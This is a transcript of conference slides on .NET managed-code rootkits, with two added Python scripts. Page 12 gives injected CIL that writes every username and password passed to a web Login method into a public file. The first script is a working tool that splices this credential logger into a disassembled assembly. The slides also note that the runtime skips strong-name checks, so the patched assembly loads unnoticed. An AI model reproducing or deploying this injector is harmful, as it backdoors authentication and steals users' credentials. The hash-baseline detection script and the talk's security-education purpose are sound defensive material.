How well do you know your runtime
Transcript of How well do you know your runtime
Page 1
How Well Do You Know Your Runtime?
Rob Gillen
@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.
Page 2
Don’t Be Stupid
The following presentation describes real attacks on real systems. Please note that most of the attacks described would be considered ILLEGAL if attempted on machines that you do not have explicit permission to test and attack. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.
Please remember this basic guideline: With knowledge comes responsibility.
Page 3
Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
Page 4
Credits
Many ideas for this talk are derived from “Managed Code Rootkits: Hooking Into Runtime Environments”, Erez Metula, Syngress, 2011
Some ideas are from “Gray Hat Python”, Justin Seitz, No Starch, 2009
Other ideas are from colleagues far
Few ideas are my own
Page 5
root·kit /ˈro͞otˌkit/
noun: rootkit; plural noun: rootkits
a set of software tools that enable an unauthorized user to gain control of a computer system without being detected.
http://google.com/search?q=define+rootkit
Page 6
A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware.
http://en.wikipedia.org/wiki/Rootkit
Page 7
Terminology
• Runtime Environment / Application-Level Virtual Machine
  • Java JVM
  • .NET Framework aka Common Language Runtime (CLR)
  • Android Dalvik
• Intermediate Language
  • MSIL (CIL)
• Managed Code
  • Java
  • C#, VB.NET, F#, etc.
Page 8
http://www.everbot.com/c-programming-language/
Page 9
http://java.sampleexamples.com/java-is-best-suited-for-internet/
Page 10
DEMO: Modifying Default Behavior
Page 11
.method public hidebysig static bool Login(string userName, string password, [opt] bool persistCookie) cil managed
{
.param [3] = bool(false)
// Code size 26 (0x1a)
.maxstack 2
.locals init (bool V_0)
IL_0000: call class WebMatrix.WebData.ExtendedMembershipProvider WebMatrix.WebData.WebSecurity::VerifyProvider()
IL_0005: pop
IL_0006: ldarg.0
IL_0007: ldarg.1
IL_0008: call bool [System.Web]System.Web.Security.Membership::ValidateUser(string, string)
IL_000d: stloc.0
IL_000e: ldloc.0
IL_000f: brfalse.s IL_0018
IL_0011: ldarg.0
IL_0012: ldarg.2
IL_0013: call void [System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string, bool)
IL_0018: ldloc.0
IL_0019: ret
} // end of method WebSecurity::Login
Page 12
// OK, let's be a little evil
// Inserted at the top of Login, ahead of the original IL_0000. ilasm recomputes
// every offset on reassembly, so the IL_00XX placeholders are dropped here; the
// original IL_xxxx labels are symbolic and remain valid branch targets.
// Note the stack: the file path stays underneath the four Concat operands, so
// five slots are live at once and the method's .maxstack must be raised from 2
// to at least 5, otherwise the JIT rejects the method as an invalid program.
nop
ldstr "C:\\Users\\Public\\mylog.txt"
ldarg.0 // get the username
ldstr ","
ldarg.1 // get the password
ldstr "\r\n"
// build the log line (concatenate the previous four strings)
call string [mscorlib]System.String::Concat(string, string, string, string)
// write the data
call void [mscorlib]System.IO.File::AppendAllText(string, string)
nop
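The demo relies on an ildasm → edit → ilasm round trip, and the edit step is easy to script. The Python below is an added example written for this transcript; it is not code from the talk or from Metula's book. It assumes the target assembly has already been dumped with `ildasm /utf8 /out:target.il target.dll` and will be rebuilt with `ilasm /dll target.il`, handles only single-line `.method` headers (ildasm emits multi-line headers for long signatures), and uses a constructed copy of the Login listing above as its sample input. It also takes care of the detail the slide glosses over: the injected sequence keeps five values on the evaluation stack, so `.maxstack` is raised before the payload goes in.

```python
"""Script the 'edit' step of an ildasm -> edit -> ilasm round trip.

Added example, not from the talk. Assumes the target was dumped with
`ildasm /utf8 /out:target.il target.dll` and is rebuilt with `ilasm /dll target.il`.
"""
import re
import sys

# The slide's payload: append "userName,password\r\n" to a world-readable file.
# mscorlib references are fully qualified so ilasm can resolve them.
CREDENTIAL_LOGGER = [
    r'ldstr      "C:\\Users\\Public\\mylog.txt"',
    r'ldarg.0',                      # userName
    r'ldstr      ","',
    r'ldarg.1',                      # password
    r'ldstr      "\r\n"',
    r'call       string [mscorlib]System.String::Concat(string, string, string, string)',
    r'call       void [mscorlib]System.IO.File::AppendAllText(string, string)',
]
# The file path sits underneath the four Concat operands: five slots are live.
CREDENTIAL_LOGGER_MAXSTACK = 5

_INSTRUCTION = re.compile(r'^\s*IL_[0-9a-fA-F]+:')
_MAXSTACK = re.compile(r'^(\s*)\.maxstack\s+(\d+)')


def inject(il_text, method_name, payload, needed_stack):
    """Insert `payload` before the first instruction of `method_name`.

    Only single-line .method headers are handled. Existing IL_xxxx labels are
    symbolic, so ilasm recomputes offsets and branch targets after the insert.
    """
    lines = il_text.splitlines()
    out, i, patched = [], 0, False
    while i < len(lines):
        line = lines[i]
        out.append(line)
        i += 1
        if not (line.lstrip().startswith('.method') and f' {method_name}(' in line):
            continue
        # Copy the directives (.param, .maxstack, .locals) up to the first
        # instruction, raising .maxstack to what the payload needs.
        while i < len(lines) and not _INSTRUCTION.match(lines[i]):
            m = _MAXSTACK.match(lines[i])
            if m:
                out.append(f'{m.group(1)}.maxstack {max(int(m.group(2)), needed_stack)}')
            else:
                out.append(lines[i])
            i += 1
        if i == len(lines):
            raise ValueError(f'{method_name}: no instructions found')
        indent = re.match(r'\s*', lines[i]).group(0)
        out.append(f'{indent}// injected')
        out.extend(indent + p for p in payload)
        patched = True
    if not patched:
        raise ValueError(f'method {method_name} not found')
    return '\n'.join(out) + '\n'


# Constructed from the Login listing on the slide (not a real ildasm dump).
SAMPLE_IL = """\
.method public hidebysig static bool Login(string userName, string password, [opt] bool persistCookie) cil managed
{
  .param [3] = bool(false)
  .maxstack 2
  .locals init (bool V_0)
  IL_0000: call class WebMatrix.WebData.ExtendedMembershipProvider WebMatrix.WebData.WebSecurity::VerifyProvider()
  IL_0005: pop
  IL_0006: ldarg.0
  IL_0007: ldarg.1
  IL_0008: call bool [System.Web]System.Web.Security.Membership::ValidateUser(string, string)
  IL_000d: stloc.0
  IL_000e: ldloc.0
  IL_000f: brfalse.s IL_0018
  IL_0011: ldarg.0
  IL_0012: ldarg.2
  IL_0013: call void [System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string, bool)
  IL_0018: ldloc.0
  IL_0019: ret
} // end of method WebSecurity::Login
"""

if __name__ == '__main__':
    if len(sys.argv) == 3:   # usage: inject_il.py target.il Login > patched.il
        with open(sys.argv[1], encoding='utf-8') as f:
            text = f.read()
    else:                    # no arguments: patch the constructed sample
        text, sys.argv = SAMPLE_IL, [sys.argv[0], '-', 'Login']
    sys.stdout.write(inject(text, sys.argv[2], CREDENTIAL_LOGGER, CREDENTIAL_LOGGER_MAXSTACK))
```

After `ilasm /dll` the rebuilt assembly no longer carries a valid strong-name signature, which is exactly what the following slides are about: for a full-trust load the runtime does not look.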
Page 13
Protection
• Local Runtime?
• Signature Checking?
Page 14
Progress?
Starting with the .NET Framework 3.5 Service Pack 1, strong-name signatures are not validated when an assembly is loaded into a full-trust application domain, such as the default application domain for the MyComputer zone. This is referred to as the strong-name bypass feature. In a full-trust environment, demands for StrongNameIdentityPermission always succeed for signed, full-trust assemblies, regardless of their signature. The strong-name bypass feature avoids the unnecessary overhead of strong-name signature verification of full-trust assemblies in this situation, allowing the assemblies to load faster.
http://msdn.microsoft.com/en-us/library/xwb8f617%28v=vs.110%29.aspx
Page 15
Mixed Success
<configuration>
  <runtime>
    <bypassTrustedAppStrongNames enabled="false" />
  </runtime>
</configuration>
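The bypass means a patched full-trust assembly loads without complaint, and the `bypassTrustedAppStrongNames` switch above only covers the application whose config carries it (and, as the next slide suggests, the loader itself is managed code). The practical check left to a defender is a hash baseline of the framework and GAC directories taken from a known-good host and compared from outside the runtime being checked. The Python below is an added example, not code from the talk; the directory layout and JSON baseline format are its own assumptions, and `demo()` uses a constructed temporary directory with fake bytes in place of a real framework path.

```python
"""Hash baseline for runtime assemblies. Added example, not from the talk.

Run it from something other than the runtime under test: a rootkit living in
mscorlib can lie to a managed checker, whereas this is plain CPython reading
bytes off disk. Paths and the baseline layout are this example's assumptions.
"""
import hashlib
import json
import os
import sys
import tempfile

ASSEMBLY_SUFFIXES = ('.dll', '.exe')


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for block in iter(lambda: f.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def build_baseline(root):
    """Map of relative path -> SHA-256 for every assembly under root."""
    baseline = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ASSEMBLY_SUFFIXES):
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, '/')
                baseline[rel] = sha256_file(full)
    return baseline


def compare(root, baseline):
    """Assemblies whose bytes changed, vanished, or appeared since the baseline."""
    current = build_baseline(root)
    return {
        'modified': sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        'missing': sorted(k for k in baseline if k not in current),
        'added': sorted(k for k in current if k not in baseline),
    }


def demo():
    """Constructed stand-in for the framework directory; file contents are fake."""
    with tempfile.TemporaryDirectory() as root:
        def write(name, data):
            with open(os.path.join(root, name), 'wb') as f:
                f.write(data)
        write('mscorlib.dll', b'MZ... unmodified')
        write('WebMatrix.WebData.dll', b'MZ... original Login')
        baseline = build_baseline(root)          # taken on the known-good host
        # An attacker swaps in the patched assembly and drops a helper next to it.
        write('WebMatrix.WebData.dll', b'MZ... Login with credential logger')
        write('Evil.Helper.dll', b'MZ... dropped alongside')
        return compare(root, baseline)


if __name__ == '__main__':
    # usage: baseline.py build <dir> > baseline.json
    #        baseline.py check <dir> baseline.json   (exit 1 on any difference)
    if len(sys.argv) == 3 and sys.argv[1] == 'build':
        json.dump(build_baseline(sys.argv[2]), sys.stdout, indent=2, sort_keys=True)
    elif len(sys.argv) == 4 and sys.argv[1] == 'check':
        with open(sys.argv[3]) as f:
            report = compare(sys.argv[2], json.load(f))
        json.dump(report, sys.stdout, indent=2)
        sys.exit(1 if any(report.values()) else 0)
    else:
        print(json.dumps(demo(), indent=2))
```

Keep the baseline off the host (or sign it), refresh it after framework updates, and treat the hash comparison as complementary to `sn.exe -vf <assembly>`, which verifies the strong name that the runtime itself skips.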
Page 16
o_O
.method assembly hidebysig static class System.Reflection.RuntimeAssembly
InternalLoadAssemblyName(
class System.Reflection.AssemblyName assemblyRef,
class System.Security.Policy.Evidence assemblySecurity,
class System.Reflection.RuntimeAssembly reqAssembly,
valuetype System.Threading.StackCrawlMark& stackMark,
native int pPrivHostBinder,
bool throwOnFileNotFound,
bool forIntrospection,
bool suppressSecurityChecks) cil managed
{
method logic…